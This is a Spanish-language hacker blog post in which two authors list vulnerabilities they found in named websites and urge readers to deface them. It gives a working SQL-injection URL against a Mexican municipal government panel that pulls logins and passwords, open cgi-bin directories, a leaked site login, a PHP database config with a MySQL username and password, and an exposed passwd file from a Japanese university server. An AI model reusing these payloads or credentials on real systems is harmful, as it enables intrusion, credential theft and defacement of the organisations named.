Si quieres afiliarte a mi blog

Conctactame ShadinessDark@hotmail.es

BUGS descubiertos por Shadinessdark y Zero Bits xD

Publicado por ShadinessDark

Zero Bits:

Ps aqui les llevare (ya que no defaceo mucho xD)


Cuando estaba en la web vuln, me meti por el panel, trate de bypassearlo si se pudo O.O, solo que solo muestran los directorios..

Panel: http://lapaz.gob.mx/sistema
Directorios: http://lapaz.gob.mx/sistema/mostrar/

Por uploads y vi:

SQLi: http://lapaz.gob.mx/sistema/mostrar/uploads/upload.php?id=-1/**/UNION/**/SELECT/**/NULL,0,concat_ws(0x3a,login,password),1,2,3/**/FROM/**/usuarios/**/limit/**/0,1--

Saludos, defaceenla si quieren..

Shadinessdark:

Directorio CGI-BIN abierto:

http://www.circustown.net/cgi-bin/
http://www.circustown.net/cgi-bin/al/waasec.ini jaskjask xD
Diganle al admin o juackeenla xDDD

____
www.evil.ie

Username = three
Password = three
______
Bueno sobre el owned de la web que pusiste xazi no sabia esmas si entras en el panel del administrador no veras nada... solo lo saque y lo puse :D hoy es mi dia de descanso :'( >:D


http://www.drmosser.com

$usuario = "mosser4refer";
$senha = "mang0";
$banco = "mosser_refer";



$conexao = mysql_connect ("localhost",$usuario,$senha);

mysql_select_db ($banco, $conexao);
?>


http://www.drmosser.com/refer/db_config.inc :P

Zero Bits:

Shadi loco sako esto (directorios abiertos): http://www.elec.ryukoku.ac.jp/~fujii/pub/ftp/moba/NECMG/REL-0.9/root_dir/etc/passwd

vi mas y vi: passwd:

Código:
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/nonexistent
operator:*:2:20:System &:/usr/guest/operator:/bin/csh
bin:*:3:7:Binaries Commands and Source,,,:/:/nonexistent
games:*:7:13:Games pseudo-user:/usr/games:/nonexistent
news:*:8:8:News Subsystem:/:/nonexistent
man:*:9:9:Mister Man Pages:/usr/share/man:/nonexistent
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
xten:*:67:67:X-10 daemon:/usr/local/xten:/nonexistent
pop:*:68:6:Post Office Owner:/nonexistent:/nonexistent
nobody:*:65534:65534:Unprivileged user:/nonexistent:/nonexistent

adivinen: Departamento de Electronica y informatica y JAPONES!! XDDD

PD. Ya los bugs fueron reportados por BugDox pero algunos todavia rondan por hay :D

Etiquetas:

0 comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)